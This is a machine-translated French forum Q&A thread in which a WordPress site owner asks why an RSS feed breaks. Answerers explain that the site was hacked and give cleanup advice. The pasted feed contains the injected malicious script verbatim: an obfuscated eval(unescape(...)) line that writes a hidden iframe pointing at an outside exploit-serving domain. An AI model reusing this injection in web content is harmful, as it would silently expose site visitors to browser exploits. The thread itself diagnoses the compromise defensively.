1. Accueil
  2. Question et réponse
  3. RSS ne mettra pas à jour

RSS ne mettra pas à jour

2010-02-05 4 views
0

Mon flux est cassé: Feed Validator dit cette partie est le problème. Des pensées?RSS ne mettra pas à jour

]]>content:encoded> 

wfw:commentRss>http://sweatingthebigstuff.com/2010/01/21/5-steps-to-get-out-of-debt/feed/wfw:commentRss> 

slash:comments>2/slash:comments> 

/item> 

/channel> 

/rss> 

script language="javascript">eval(unescape("%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%69%73%73%39%77%38%73%38%39%78%78%2E%6F%72%67%2F%69%6E%2E%70%68%70%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%30%3E%3C%2F%69%66%72%61%6D%65%3E%27%29%3B"))</script>

Source

2010-02-05 Daniel

+0

Tout est cassé - toutes les ouvertures <

+0

J'ai enlevé le Daniel

Répondre

4 
<script language="javascript">eval(unescape("%64%6F%63...

Vous avez été piraté. Un attaquant a compromis votre site et a ajouté ce script au bas de certaines de vos pages (probablement toutes, à en juger par votre site principal). Il charge un tas de code d'exploitation contre les navigateurs Web et les plugins qui tentent d'infecter les ordinateurs des autres. Le fait que le RSS soit invalide est un effet secondaire.

Vous devez mettre le site hors ligne avant qu'il infecte plus de personnes, puis travailler sur le nettoyage, ce qui dépend de la façon dont ils l'ont compromis/quel type de serveur il est. Certainement à tout le moins, vous aurez besoin de supprimer votre code de site actuel et de télécharger de nouveaux scripts, à partir d'une machine que vous savez est propre (*), avec tous vos mots de passe changés. Si c'est votre propre serveur [virtuel], vous devrez vérifier que le serveur lui-même n'a pas été rooté. (*: Très souvent, les sites sont compromis par des machines client piratées fonctionnant en FTP.Les chevaux de Troie volent les mots de passe FTP lorsque vous vous connectez .Vous devez donc vérifier et désinfecter chaque machine que vous avez pu utiliser. Et si vous trouvez quelque chose de suspect sur l'un d'entre eux, ne faites pas confiance aux outils AV pour le nettoyer complètement, car aujourd'hui, ils ne peuvent tout simplement pas suivre la quantité de codes malveillants. à la place.)

Source

2010-02-05 12:28:40 bobince

+0

Cela ne sonne pas bien. J'utilise wordpress et godaddy. J'ai arrêté d'utiliser FTP il y a des mois après l'expiration de mon essai. Je n'ai aucune idée de ce qu'il faut faire à ce sujet. J'adorerais vous embaucher pour m'aider. Intéressé? – Daniel

+0

Quelques conseils sur ce qu'il faut faire: http://googlewebmastercentral.blogspot.com/2008/04/my-sites-been-hacked-now-what.html –

+0

@Daniel: Eh bien essayons de le résoudre ici d'abord! Comment vous connectez-vous pour mettre à jour le site depuis votre arrêt avec FTP? (par exemple, SFTP? Avec le même mot de passe que FTP utilisé?) Votre mot de passe est-il fort ou un simple mot de passe? Essayez d'exécuter plusieurs vérificateurs de virus sur votre ordinateur client et tous ceux utilisés pour mettre à jour le site. A en juger par la position où il a inséré le '

Questions connexes

 Questions connexes